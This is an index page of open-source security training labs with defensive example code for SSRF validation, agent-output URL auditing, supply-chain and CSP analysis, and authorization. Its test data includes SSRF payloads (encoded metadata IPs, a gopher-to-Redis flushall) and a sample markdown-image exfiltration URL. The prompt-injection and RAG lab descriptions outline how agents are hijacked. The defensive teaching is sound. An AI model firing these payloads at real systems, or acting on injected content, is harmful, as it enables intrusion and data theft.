
Labs

Hands-on, opinionated security playgrounds. Each lab pairs a working demo with the failure modes I've actually seen in production. Built because the topics here don't survive PowerPoint.

Live · New

Detection Engineering

Real Sysmon, CloudTrail, and Entra sign-in telemetry from real incidents (Midnight Blizzard 2024, Volt Typhoon, Storm-0558), ground-truth labeled, with a naive and a tuned Sigma-style rule for each. Edit either rule's match tree as JSON and watch precision, recall, and F1 update live. Plus one Sigma-equivalent starter rule per lab domain.

  • Five attack scenarios, ground-truth labeled
  • Sigma-equivalent match engine (eq/regex/and/or/not)
  • Live precision / recall / F1 metrics
  • Per-lab Sigma starter rules (CSP / JWT / SSRF / IAM / …)
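To make the match-tree and metrics mechanics concrete, here is an added example (not the lab's own engine): a minimal evaluator for the eq/regex/and/or/not node types, scored against a handful of constructed Sysmon-style process-creation events with ground-truth labels. The field names, the two rules and the events are assumptions for illustration; none of it is the lab's telemetry.

```javascript
// Added example (not the lab's code): a Sigma-style match-tree evaluator plus
// precision/recall/F1 over a constructed, labeled event set. Node types follow
// the lab's description (eq/regex/and/or/not); events and rules are invented.

// Evaluate a match tree against one flat event object.
function matches(node, event) {
  switch (node.op) {
    case 'eq':    return event[node.field] === node.value;
    case 'regex': return new RegExp(node.pattern, node.flags || '').test(String(event[node.field] ?? ''));
    case 'and':   return node.children.every((c) => matches(c, event));
    case 'or':    return node.children.some((c) => matches(c, event));
    case 'not':   return !matches(node.child, event);
    default:      throw new Error(`unknown op ${node.op}`);
  }
}

// Score a rule against ground-truth-labeled events (`malicious: true|false`).
function score(rule, events) {
  let tp = 0, fp = 0, fn = 0;
  for (const e of events) {
    const hit = matches(rule, e);
    if (hit && e.malicious) tp++;
    else if (hit && !e.malicious) fp++;
    else if (!hit && e.malicious) fn++;
  }
  const precision = tp + fp === 0 ? 0 : tp / (tp + fp);
  const recall = tp + fn === 0 ? 0 : tp / (tp + fn);
  const f1 = precision + recall === 0 ? 0 : (2 * precision * recall) / (precision + recall);
  return { tp, fp, fn, precision, recall, f1 };
}

// Constructed Sysmon-like EventID 1 records, not real telemetry.
const RUNDLL32 = 'C:\\Windows\\System32\\rundll32.exe';
const EVENTS = [
  { Image: RUNDLL32, CommandLine: 'rundll32.exe comsvcs.dll, MiniDump 624 C:\\temp\\lsass.dmp full', ParentImage: 'C:\\Windows\\System32\\cmd.exe', malicious: true },
  { Image: RUNDLL32, CommandLine: 'rundll32.exe shell32.dll,Control_RunDLL desk.cpl', ParentImage: 'C:\\Windows\\explorer.exe', malicious: false },
  { Image: RUNDLL32, CommandLine: 'rundll32.exe C:\\Users\\Public\\x.dll,Start', ParentImage: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', malicious: true },
  { Image: RUNDLL32, CommandLine: 'rundll32.exe printui.dll,PrintUIEntry /in /n \\\\srv\\p1', ParentImage: 'C:\\Windows\\System32\\svchost.exe', malicious: false },
  { Image: RUNDLL32, CommandLine: 'rundll32.exe comsvcs.dll MiniDump 700 C:\\temp\\a.dmp full', ParentImage: 'C:\\Windows\\System32\\cmd.exe', malicious: true },
  { Image: RUNDLL32, CommandLine: 'rundll32.exe inetcpl.cpl,ClearMyTracksByProcess 8', ParentImage: 'C:\\Windows\\explorer.exe', malicious: false },
];

// Naive rule: any rundll32 execution. Perfect recall, half of the hits are noise.
const NAIVE = { op: 'eq', field: 'Image', value: RUNDLL32 };

// Tuned rule: rundll32 invoking the comsvcs MiniDump export or loading a DLL
// from a user-writable path, excluding explorer-spawned control-panel helpers.
const TUNED = {
  op: 'and',
  children: [
    { op: 'eq', field: 'Image', value: RUNDLL32 },
    { op: 'not', child: { op: 'eq', field: 'ParentImage', value: 'C:\\Windows\\explorer.exe' } },
    { op: 'or', children: [
      { op: 'regex', field: 'CommandLine', pattern: 'comsvcs\\.dll,?\\s+MiniDump', flags: 'i' },
      { op: 'regex', field: 'CommandLine', pattern: '\\\\Users\\\\Public\\\\', flags: 'i' },
    ] },
  ],
};

console.log('naive', score(NAIVE, EVENTS));
console.log('tuned', score(TUNED, EVENTS));
```

Editing either tree and re-running `score` is exactly the loop the lab runs live: the naive rule lands at precision 0.5 / recall 1.0 on this set, the tuned one at 1.0 / 1.0, and the interesting work is watching recall fall when a tuning clause is too specific.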
Live · New

Agent Identity Lab

RFC 8693 token exchange in motion: pick a user, an agent, scopes, a TTL, and watch all three JWTs decoded side-by-side with a claims diff explaining what came from subject_token, what came from actor_token, and what the STS narrowed. Run the eight-rule drift detector against a fixture inventory of seven agents.

  • RFC 8693 token-exchange playground with claims diff
  • 8-rule drift detector (AGT01–AGT08)
  • Six attestation surfaces compared
  • Companion to the Agent Identity Front essay
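The three-way claims attribution is the part of token exchange people find hardest to picture, so here is an added example (not the lab's code): a toy STS that performs the RFC 8693 exchange and labels each issued claim by its source. The `act`, `scope`, `sub`, `aud`, `exp` and `iat` names are the RFC and JWT claim names; the issuer URLs, the per-agent scope ceiling and the sample token payloads are constructed for this example.

```javascript
// Added example, not the lab's code: a toy RFC 8693 token-exchange STS. It
// issues the delegated token's claims and a provenance map saying which claim
// came from the subject_token, which from the actor_token, and which the STS
// narrowed. Issuer URLs, the agent scope ceiling and the tokens are constructed.

// Per-agent ceiling on what may ever be delegated to it (assumed policy shape).
const AGENT_MAX_SCOPES = {
  'spiffe://corp/agent/ticket-triage': ['tickets:read', 'tickets:comment'],
};

function exchange({ subject, actor, requestedScopes, ttlSeconds, now, audience }) {
  // RFC 8693 delegation: the token still represents the subject (sub), and the
  // party acting on their behalf is recorded in the nested `act` claim.
  const ceiling = AGENT_MAX_SCOPES[actor.sub] || [];
  const scope = requestedScopes.filter((s) => subject.scope.includes(s) && ceiling.includes(s));
  const exp = Math.min(subject.exp, now + ttlSeconds);   // never outlive the user's own token
  const issued = {
    iss: 'https://sts.example',
    sub: subject.sub,
    aud: audience,
    iat: now,
    exp,
    scope: scope.join(' '),
    act: { sub: actor.sub },
  };
  return { issued, dropped: requestedScopes.filter((s) => !scope.includes(s)) };
}

// Attribute each issued claim to its source, for a side-by-side claims diff.
function claimsDiff(subject, issued) {
  const origin = {};
  for (const [k, v] of Object.entries(issued)) {
    if (k === 'act') origin[k] = 'actor_token';
    else if (k === 'scope') origin[k] = v === subject.scope.join(' ') ? 'subject_token' : 'sts:narrowed';
    else if (k === 'exp') origin[k] = v === subject.exp ? 'subject_token' : 'sts:narrowed';
    else if (subject[k] === v) origin[k] = 'subject_token';
    else origin[k] = 'sts';
  }
  return origin;
}

// Constructed, already-decoded token payloads (signature checks are out of scope here).
const NOW = 1700000000;
const SUBJECT = { iss: 'https://login.example', sub: 'alice@example.com',
  scope: ['tickets:read', 'tickets:comment', 'tickets:delete', 'billing:read'], exp: NOW + 3600 };
const ACTOR = { iss: 'https://sts.example', sub: 'spiffe://corp/agent/ticket-triage', exp: NOW + 86400 };

const RESULT = exchange({
  subject: SUBJECT, actor: ACTOR,
  requestedScopes: ['tickets:read', 'tickets:delete', 'billing:read'],
  ttlSeconds: 300, now: NOW, audience: 'https://tickets.example/api',
});
console.log(RESULT.issued, RESULT.dropped, claimsDiff(SUBJECT, RESULT.issued));
```

The two narrowing decisions are the ones worth checking in any real STS: the scope is the intersection of what the user holds and what the agent is allowed to be handed (so `tickets:delete` and `billing:read` are dropped even though Alice has them), and the expiry is bounded by the user's own token, not just the requested TTL.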
Live · New

IAM Privilege Escalation

A live attack-path enumerator across AWS, Azure, and GCP. Edit a principal directory and watch the engine derive every transition from the 12-technique catalog (PassRole+RunInstances, UpdateAssumeRolePolicy, Application.ReadWrite.All, iam.serviceAccounts.actAs) and BFS to an admin principal. Modeled on Pacu, CloudGoat, and AzureHound.

  • 12 published privesc techniques across three clouds
  • Editable principal graph with live path enumeration
  • Multi-hop chains through groups and roles
  • Citations to Rhino, SpecterOps, hackingthe.cloud
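The "derive edges from a catalog, then BFS" shape is simple enough to show end to end. This is an added example, not the lab's engine: three techniques (two AWS privesc primitives plus plain group membership) expressed as edge-derivation functions over a small constructed principal directory, and a breadth-first search that returns the shortest chain to an admin principal. The directory, the coarse permission matching and the technique preconditions are simplified assumptions; the lab's 12-technique catalog is not reproduced.

```javascript
// Added example (not the lab's code): derive privilege-escalation edges from a
// principal directory with a tiny technique catalog, then BFS to an admin.
// Directory, permission matching and technique preconditions are simplified.

// Coarse IAM-style matching: exact action, service wildcard ("iam:*") or "*".
function has(p, perm) {
  const [svc] = perm.split(':');
  return p.permissions.some((x) => x === perm || x === `${svc}:*` || x === '*');
}

// Each technique returns the principals that `p` can become by using it.
const TECHNIQUES = [
  { // AWS: launch an EC2 instance with an existing role attached, then use its credentials.
    id: 'aws:PassRole+RunInstances',
    edges: (p, dir) => has(p, 'iam:PassRole') && has(p, 'ec2:RunInstances')
      ? dir.filter((t) => t.type === 'role' && t.trusts.includes('ec2.amazonaws.com')) : [],
  },
  { // AWS: rewrite any role's trust policy so we may assume it directly.
    id: 'aws:UpdateAssumeRolePolicy',
    edges: (p, dir) => has(p, 'iam:UpdateAssumeRolePolicy') ? dir.filter((t) => t.type === 'role') : [],
  },
  { // Group membership is an edge too: the user inherits the group's permissions.
    id: 'membership',
    edges: (p, dir) => dir.filter((t) => t.type === 'group' && (p.memberOf || []).includes(t.name)),
  },
];

// BFS over derived edges; returns the shortest path to an admin, or null.
function findPathToAdmin(startName, dir) {
  const byName = Object.fromEntries(dir.map((p) => [p.name, p]));
  const queue = [[{ name: startName, via: null }]];
  const seen = new Set([startName]);
  while (queue.length) {
    const path = queue.shift();
    const cur = byName[path[path.length - 1].name];
    if (cur.admin) return path.map((s) => (s.via ? `${s.via} -> ${s.name}` : s.name));
    for (const tech of TECHNIQUES) {
      for (const target of tech.edges(cur, dir)) {
        if (seen.has(target.name)) continue;
        seen.add(target.name);
        queue.push([...path, { name: target.name, via: tech.id }]);
      }
    }
  }
  return null;
}

// Constructed principal directory (not a real account).
const DIRECTORY = [
  { name: 'dev-bob', type: 'user', permissions: ['s3:GetObject'], memberOf: ['ci-operators'] },
  { name: 'ci-operators', type: 'group', permissions: ['iam:PassRole', 'ec2:RunInstances'] },
  { name: 'ec2-deploy-role', type: 'role', trusts: ['ec2.amazonaws.com'], permissions: ['iam:UpdateAssumeRolePolicy'] },
  { name: 'OrgAdmin', type: 'role', trusts: ['arn:aws:iam::111122223333:root'], permissions: ['*'], admin: true },
  { name: 'auditor', type: 'user', permissions: ['iam:Get*'] },
];

console.log(findPathToAdmin('dev-bob', DIRECTORY));
console.log(findPathToAdmin('auditor', DIRECTORY));
```

The chain it finds for `dev-bob` is the multi-hop case the lab cares about: a harmless-looking user, a group that holds PassRole+RunInstances, a deploy role that can edit trust policies, and from there the admin role. A real catalog adds the Azure and GCP techniques the page lists and, importantly, resource-level conditions on each permission, which this coarse matcher ignores.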
Live · New

Supply Chain Lab

Real supply-chain compromises, replayed against a live provenance analyzer. Replicas of event-stream (2018), ua-parser-js (2021), node-ipc (2022), 3CX (2023), XZ Utils (2024), Ultralytics (2024), LottieFiles (2024), and tj-actions (2025). Seven detection rules covering install hooks, rapid republish, publisher-IP drift, missing build provenance, and known typosquat patterns.

  • Eight real-incident replicas with citations
  • 7-rule provenance analyzer (PROV01–PROV07)
  • Ten typosquat patterns drawn from real campaigns
  • Sigstore / npm-provenance verification flow
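To show what a provenance rule actually looks at, here is an added example, not the lab's analyzer: five checks over a constructed npm-style release record, one for each of the signals named above. The rule names, thresholds, field layout and both sample records are this example's assumptions; the lab's PROV01 to PROV07 IDs and exact logic are not reproduced.

```javascript
// Added example (not the lab's analyzer): five provenance checks over a
// constructed release record. Rule names, thresholds and fields are assumed.

// A few popular names to compare against for typosquatting (illustrative list).
const POPULAR = ['lodash', 'express', 'react', 'ua-parser-js', 'node-ipc'];

// Levenshtein distance, used by the typosquat check.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
    }
  }
  return d[a.length][b.length];
}

const RULES = [
  { id: 'install-hook',
    test: (r) => ['preinstall', 'install', 'postinstall'].some((k) => r.scripts && r.scripts[k]),
    why: 'lifecycle script runs arbitrary code at install time' },
  { id: 'rapid-republish',
    test: (r) => r.previousPublishedAt != null && r.publishedAt - r.previousPublishedAt < 60 * 60,
    why: 'new version published less than an hour after the previous one' },
  { id: 'publisher-drift',
    test: (r) => r.publisher.historicalASNs.length > 0 && !r.publisher.historicalASNs.includes(r.publisher.asn),
    why: 'publish came from a network the maintainer has never published from' },
  { id: 'no-provenance',
    test: (r) => !r.attestations || r.attestations.length === 0,
    why: 'no build provenance attestation (npm --provenance / Sigstore) attached' },
  { id: 'typosquat',
    test: (r) => POPULAR.some((p) => p !== r.name && editDistance(p, r.name) === 1),
    why: 'name is one edit away from a popular package' },
];

function analyze(release) {
  return RULES.filter((rule) => rule.test(release)).map((rule) => ({ id: rule.id, why: rule.why }));
}

// Constructed release records, not real registry data.
const SUSPICIOUS = {
  name: 'ua-parser-j5', version: '0.7.30',
  publishedAt: 1635450000, previousPublishedAt: 1635449400,   // ten minutes apart
  scripts: { preinstall: 'node preinstall.js' },
  publisher: { asn: 64512, historicalASNs: [15169, 16509] },
  attestations: [],
};
const CLEAN = {
  name: 'ua-parser-js', version: '0.7.31',
  publishedAt: 1635600000, previousPublishedAt: 1635450000,
  scripts: { test: 'mocha' },
  publisher: { asn: 15169, historicalASNs: [15169, 16509] },
  attestations: [{ predicateType: 'https://slsa.dev/provenance/v1', issuer: 'https://token.actions.githubusercontent.com' }],
};

console.log(analyze(SUSPICIOUS).map((f) => f.id));
console.log(analyze(CLEAN));
```

No single rule here is a conviction: plenty of honest packages have a postinstall script or ship without provenance. The analyzer's value is that the replayed incidents light up several of these at once, which is the signal a reviewer can act on before `npm install` runs the hook.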
Live · New

RAG Security Lab

Real attacks against retrieval-augmented generation, replayed with a deterministic in-browser vector store. Indirect prompt injection (Greshake 2023), PoisonedRAG ranking attacks (Zou 2024), markdown image canary exfil, citation forgery, training-data extraction (Carlini 2023). Naive vs four-defense hardened agent side by side.

  • Six published attacks reproduced with full traces
  • Spotlighting + URL allowlist + grounding + dedup
  • Live retrievals with cosine-similarity scores
  • Four-rule corpus analyzer (RAG01–RAG04)
Live · New

Prompt Injection Lab

Indirect prompt injection, tool-call hijacking, exfiltration via markdown images. A deterministic side-by-side simulator of a naive vs hardened agent on identical attacker-crafted documents, now with a five-tool agent loop, 12 scenarios, and exportable telemetry. No LLM API key required.

  • Live five-tool agent loop, 12 scenarios
  • 10-rule injection detector (PI01–PI10)
  • Hardened-policy editor with live re-runs
  • JSON telemetry export
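Both this lab and the RAG lab above lean on the same output-side defense: an allowlist for the URLs an agent is permitted to emit, which is what stops the markdown-image exfiltration channel. Here it is as an added example, not code from either lab: a scanner over an agent's markdown output that extracts image and link targets, blocks any host outside an allowlist, and flags a canary value smuggled into a URL. The allowlist, the canary and the sample output are constructed.

```javascript
// Added example (not the labs' code): URL-allowlist audit of agent markdown
// output, covering the markdown-image exfil channel both labs replay. The
// allowlist, canary and agent output below are constructed.

const ALLOWED_HOSTS = new Set(['docs.example.com', 'wiki.example.com']);

// Matches ![alt](url) and [text](url); group 1 is "!" for images.
const MD_LINK = /(!?)\[[^\]]*\]\(([^)\s]+)\)/g;

function auditMarkdown(output, { canary } = {}) {
  const findings = [];
  let safe = output;
  for (const m of output.matchAll(MD_LINK)) {
    const [whole, bang, target] = m;
    let url;
    try { url = new URL(target); } catch { continue; }           // relative links are left alone
    const kind = bang ? 'image' : 'link';
    const reasons = [];
    if (!ALLOWED_HOSTS.has(url.hostname)) reasons.push('host-not-allowlisted');
    // Exfil rides in the query or fragment: decode once and look for the session canary.
    if (canary && decodeURIComponent(url.search + url.hash).includes(canary)) reasons.push('canary-in-url');
    // Images auto-fetch with no click, and rarely need parameters.
    if (kind === 'image' && url.search) reasons.push('image-with-query');
    if (reasons.length) {
      findings.push({ kind, url: url.href, reasons });
      safe = safe.replace(whole, `[${kind} removed: ${url.hostname}]`);
    }
  }
  return { findings, safe };
}

// Constructed agent output: one legitimate citation and one exfil attempt
// that leaked the session canary into an image URL.
const CANARY = 'CANARY-7f3a';
const AGENT_OUTPUT = [
  'Per the runbook ([restart procedure](https://docs.example.com/runbooks/restart)), do the following.',
  `![status](https://attacker.invalid/px.png?d=${encodeURIComponent(`secret=${CANARY}`)})`,
].join('\n');

console.log(auditMarkdown(AGENT_OUTPUT, { canary: CANARY }));
```

The canary is the cheap way to make this measurable in a lab: plant a unique token in the context window, and any URL that carries it out is proof of exfiltration regardless of how the injection was phrased. In production the allowlist check is the one that does the work, because the attacker's domain is never going to be on it.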
Live · New

SSRF / Cloud Metadata

Why 169.254.169.254, the cloud metadata address, is one of the most-targeted IPs in SSRF attacks. Live fetcher sandbox replaying 10 payloads (decimal / hex / octal IPv4, IPv6 loopback, DNS rebinding, AWS IMDSv1, GCP-via-Host-smuggle, Redis CRLF, K8s API ServiceAccount, gopher → Redis RCE) through a naive fetcher and a hardened one side by side.

  • Live fetcher sandbox with 10-scenario catalog
  • Naive vs hardened (H-SCHEME / H-CRLF / H-IPRANGE / …)
  • Sandboxed /api/ssrf-fetch for curl + SIEM replay
  • Capital One IMDS, Orange Tsai 2017, OWASP cheat sheet
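The hardened fetcher's job is mostly target validation, and the payload list above is a good test suite for it. As an added example (not the lab's fetcher), here is that validation step: it lets the WHATWG URL parser canonicalize the decimal/hex/octal IPv4 spellings, parses the resulting IPv4 or IPv6 host itself, rejects loopback, link-local, private and IPv4-mapped targets, and routes DNS names through an injected resolver so the check runs on the address the socket would connect to. The reason codes reuse the lab's H-* labels but the logic is this example's own; the resolver map and every sample URL are constructed.

```javascript
// Added example, not the lab's fetcher: the target-validation half of a
// hardened fetcher. Node's URL (WHATWG) rewrites decimal/hex/octal IPv4 to
// dotted form; we then parse and range-check the host. FAKE_DNS stands in for
// a pinned resolution (rebinding defense: check the address you connect to).
// H-* reason codes borrow the lab's labels; logic and samples are this example's.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const BLOCKED_V4 = ['0.0.0.0/8', '10.0.0.0/8', '100.64.0.0/10', '127.0.0.0/8',
                    '169.254.0.0/16', '172.16.0.0/12', '192.168.0.0/16'];

// Dotted-quad only: the URL parser has already rewritten other IPv4 spellings.
function parseIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  return o.some((x) => x > 255) ? null : ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
}

// Eight 16-bit groups, or null. Accepts the bracketed form URL.hostname returns.
function parseIPv6(host) {
  const s = host.replace(/^\[|\]$/g, '');
  const parts = s.split('::');
  if (parts.length > 2 || !/^[0-9a-fA-F:.]+$/.test(s)) return null;
  const toGroups = (part) => (part ? part.split(':').flatMap((g) => {
    const v4 = parseIPv4(g);                                   // dotted-quad tail, e.g. ::ffff:169.254.169.254
    return v4 !== null ? [v4 >>> 16, v4 & 0xffff] : [/^[0-9a-fA-F]{1,4}$/.test(g) ? parseInt(g, 16) : NaN];
  }) : []);
  const head = toGroups(parts[0]), tail = toGroups(parts[1]);
  if ([...head, ...tail].some(Number.isNaN)) return null;
  const fill = 8 - head.length - tail.length;
  if (fill < 0 || (parts.length === 1 && fill !== 0)) return null;
  return [...head, ...Array(fill).fill(0), ...tail];
}

function isBlockedIPv4(n) {
  return BLOCKED_V4.some((cidr) => {
    const [base, bits] = cidr.split('/');
    return (n >>> (32 - bits)) === (parseIPv4(base) >>> (32 - bits));
  });
}

function isBlockedIPv6(g) {
  if (g.slice(0, 5).every((x) => x === 0) && g[5] === 0xffff) {      // ::ffff:a.b.c.d
    return isBlockedIPv4(((g[6] << 16) | g[7]) >>> 0);
  }
  const unspecified = g.every((x) => x === 0);                          // ::
  const loopback = g.slice(0, 7).every((x) => x === 0) && g[7] === 1;   // ::1
  return unspecified || loopback || (g[0] & 0xffc0) === 0xfe80 || (g[0] & 0xfe00) === 0xfc00;
}

function checkTarget(rawUrl, resolve) {
  if (/[\r\n]/.test(rawUrl)) return { ok: false, reason: 'H-CRLF' };   // the parser would silently strip these
  let url;
  try { url = new URL(rawUrl); } catch { return { ok: false, reason: 'H-PARSE' }; }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return { ok: false, reason: 'H-SCHEME' };
  const host = url.hostname;
  let addrs;
  if (host.startsWith('[')) addrs = [parseIPv6(host)];
  else if (parseIPv4(host) !== null) addrs = [parseIPv4(host)];
  else addrs = resolve(host).map((ip) => (ip.includes(':') ? parseIPv6(ip) : parseIPv4(ip)));
  if (addrs.length === 0 || addrs.some((a) => a === null)) return { ok: false, reason: 'H-DNS' };
  const blocked = addrs.some((a) => (Array.isArray(a) ? isBlockedIPv6(a) : isBlockedIPv4(a)));
  return blocked ? { ok: false, reason: 'H-IPRANGE' } : { ok: true, host, addrs };
}

// Constructed resolver; 'rebind.example' models a DNS-rebinding second answer.
const FAKE_DNS = {
  'metadata.internal': ['169.254.169.254'],
  'docs.example.com': ['93.184.216.34'],
  'rebind.example': ['93.184.216.34', '127.0.0.1'],
};
const resolve = (name) => FAKE_DNS[name] || [];

const PAYLOADS = [
  'http://2852039166/latest/meta-data/',             // decimal IPv4
  'http://0xa9fea9fe/latest/meta-data/',             // hex IPv4
  'http://0251.0376.0251.0376/latest/meta-data/',    // octal IPv4
  'http://[::ffff:169.254.169.254]/',                // IPv4-mapped IPv6
  'http://[::1]:6379/',                              // IPv6 loopback
  'gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A',  // gopher -> Redis
  'http://docs.example.com/\r\nX-Injected: 1',       // raw CRLF
  'http://metadata.internal/computeMetadata/v1/',    // name that resolves to IMDS
  'http://rebind.example/',                          // one answer is loopback
  'https://docs.example.com/runbooks/restart',       // allowed
];
for (const p of PAYLOADS) console.log(JSON.stringify(p), checkTarget(p, resolve));
```

Two caveats a real fetcher has to add on top of this: it must connect to the address it validated rather than resolving again (or the rebinding payload wins on the second lookup), and it must re-run the check on every redirect hop, since `https://docs.example.com/` is allowed to 302 to `http://169.254.169.254/`. Percent-encoded CRLF is deliberately not rejected here because an HTTP client sends it encoded; it only becomes an injection over raw protocols like the Redis case, which the scheme allowlist already excludes.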
Live · New

Identity Lab

Phishing-resistant authentication, end to end. Register a passkey in your browser, decode real JWTs and see what makes them forgeable, and learn how the same primitives apply to AI agents acting on a user's behalf. Now with a JWT forging workbench against an intentionally-misconfigurable verifier.

  • WebAuthn / passkey registration + sign-in
  • JWT inspector + forging workbench (4 CVE-class attacks)
  • Phishing-resistant MFA explainer
  • Agent identity (OIDC, SPIFFE, RFC 8693)
Live

CSP Playground

Paste a Content-Security-Policy header, watch the analyzer flag the same patterns I flag in client engagements: unsafe-inline, wildcards, missing object-src, no nonce, no report-uri. Then see the four canonical CSP shapes side by side.

  • Live CSP header analyzer (12 rules)
  • Four canonical policy shapes compared
  • Common bypass patterns (JSONP, base-uri, dangling markup)
  • Migration path from unsafe-inline to nonces
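Here is an added example, not the playground's analyzer: a CSP header parser and seven of the checks listed above, honouring the spec's fallback rule (script-src and object-src fall back to default-src; base-uri does not). The rule names, the rule subset and both sample headers are this example's own.

```javascript
// Added example, not the playground's analyzer: parse a CSP header and run a
// subset of the checks the page lists. Rule names and sample headers are ours.

function parseCsp(header) {
  const directives = {};
  for (const chunk of header.split(';')) {
    const [name, ...values] = chunk.trim().split(/\s+/);
    // Browsers ignore a repeated directive after its first occurrence; so do we.
    if (name && !(name.toLowerCase() in directives)) directives[name.toLowerCase()] = values;
  }
  return directives;
}

// script-src and object-src fall back to default-src; base-uri has no fallback.
function effective(d, name) {
  if (d[name]) return d[name];
  if (name !== 'base-uri' && d['default-src']) return d['default-src'];
  return null;                                      // absent, and no fallback applies
}

const scriptSrc = (d) => effective(d, 'script-src') || [];
const hasNonceOrHash = (d) => scriptSrc(d).some((v) => /^'(nonce-[^']+|sha(256|384|512)-[^']+)'$/.test(v));

const RULES = [
  { id: 'script-unsafe-inline',
    test: (d) => scriptSrc(d).includes("'unsafe-inline'") && !hasNonceOrHash(d),
    fix: "replace 'unsafe-inline' with per-response nonces (browsers ignore 'unsafe-inline' once a nonce/hash is present)" },
  { id: 'script-wildcard',
    test: (d) => scriptSrc(d).some((v) => v === '*' || v === 'https:' || v === 'http:'),
    fix: 'name the script hosts, or use nonces with strict-dynamic' },
  { id: 'script-unsafe-eval',
    test: (d) => scriptSrc(d).includes("'unsafe-eval'"),
    fix: 'remove eval / new Function call sites' },
  { id: 'missing-object-src',
    test: (d) => effective(d, 'object-src') === null,
    fix: "add object-src 'none'" },
  { id: 'missing-base-uri',
    test: (d) => effective(d, 'base-uri') === null,
    fix: "add base-uri 'none' or 'self' so an injected <base> cannot redirect relative script URLs" },
  { id: 'no-nonce-or-hash',
    test: (d) => !hasNonceOrHash(d),
    fix: 'move inline scripts behind a nonce or hash source' },
  { id: 'no-reporting',
    test: (d) => !d['report-uri'] && !d['report-to'],
    fix: 'add report-to (or report-uri) so violations are observed' },
];

function analyzeCsp(header) {
  const d = parseCsp(header);
  return RULES.filter((r) => r.test(d)).map((r) => r.id);
}

// Constructed headers: a typical legacy policy and a nonce-based strict one.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:; img-src *";
const STRICT_CSP = "script-src 'nonce-r4nd0mBase64' 'strict-dynamic'; object-src 'none'; base-uri 'none'; report-to csp-endpoint";

console.log(analyzeCsp(WEAK_CSP));
console.log(analyzeCsp(STRICT_CSP));
```

Note which directives the fallback rule saves and which it does not: `default-src 'self'` quietly covers a missing object-src, but nothing covers a missing base-uri, which is why the weak header above is flagged for base-uri and not for object-src. The nonce in the strict header must of course be freshly random per response; a static value is just 'unsafe-inline' with extra steps.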
Live

AuthZ Lab — IDOR / BOLA

Broken Object Level Authorization is API1 in the OWASP API Security Top 10. Pick a user, request someone else's order ID, and watch the naive endpoint hand it over while the hardened endpoint returns 404 (not 403, which would confirm the ID exists). Eight detection rules covering missing owner scope, 403-vs-404 leakage, sequential IDs, and mass assignment.

  • Naive vs hardened endpoint simulator
  • 8-rule pattern catalog (BOLA01–BOLA08)
  • SARIF/JSON export of the ruleset
  • Pairs with the AuthN work in Identity Lab
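The 403-versus-404 point is subtle enough to deserve a worked example, added here and not the lab's simulator: three versions of the order endpoint as handler functions over an in-memory store, plus the enumeration an attacker runs with someone else's session. The store, user names and IDs are constructed.

```javascript
// Added example (not the lab's code): naive, leaky and hardened order lookups
// over a constructed in-memory store, and what sequential-ID enumeration sees.

const ORDERS = [
  { id: 1001, owner: 'alice', total: 42.5 },
  { id: 1002, owner: 'bob', total: 17.0 },
  { id: 1003, owner: 'alice', total: 99.99 },
];

const notFound = () => ({ status: 404, body: { error: 'not found' } });

// Naive: trusts the client-supplied id and never checks ownership.
function getOrderNaive(session, orderId) {
  const order = ORDERS.find((o) => o.id === orderId);
  return order ? { status: 200, body: order } : notFound();
}

// Leaky: authorization is correct, but 403 confirms that the id exists.
function getOrderLeaky403(session, orderId) {
  const order = ORDERS.find((o) => o.id === orderId);
  if (!order) return notFound();
  if (order.owner !== session.user) return { status: 403, body: { error: 'forbidden' } };
  return { status: 200, body: order };
}

// Hardened: the owner is part of the lookup key rather than a post-hoc check,
// and "exists but not yours" is indistinguishable from "does not exist".
function getOrderHardened(session, orderId) {
  const order = ORDERS.find((o) => o.id === orderId && o.owner === session.user);
  return order ? { status: 200, body: order } : notFound();
}

// What a caller holding bob's session learns by walking a sequential id range.
function enumerate(handler, session, from, to) {
  const statuses = {};
  for (let id = from; id <= to; id++) statuses[id] = handler(session, id).status;
  return statuses;
}

const BOB = { user: 'bob' };
console.log('naive   ', enumerate(getOrderNaive, BOB, 1001, 1004));
console.log('leaky   ', enumerate(getOrderLeaky403, BOB, 1001, 1004));
console.log('hardened', enumerate(getOrderHardened, BOB, 1001, 1004));
```

Against the hardened handler, Bob's sweep returns 404 for every id except his own, so he learns nothing about how many orders exist or which ids are live. The leaky variant is the one that passes most code reviews: the data never leaks, but the 403s draw a map of the whole table, which is exactly what the sequential-IDs rule is worried about.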

Why labs

Every security finding I've ever written has been more convincing when the reader could touch the bug. Slide decks let people nod along; a working demo, with the actual headers on the actual wire, is what changes architecture decisions.

These labs cost nothing to run, are linkable in a code review, and each one is a complete teaching artifact in under five minutes. If you're an engineer trying to convince a leader, or a leader trying to understand an engineer, that's what they're for.

Source

Everything is open source under MIT. github.com/mdiallo15/identity-lab. Issues and PRs welcome.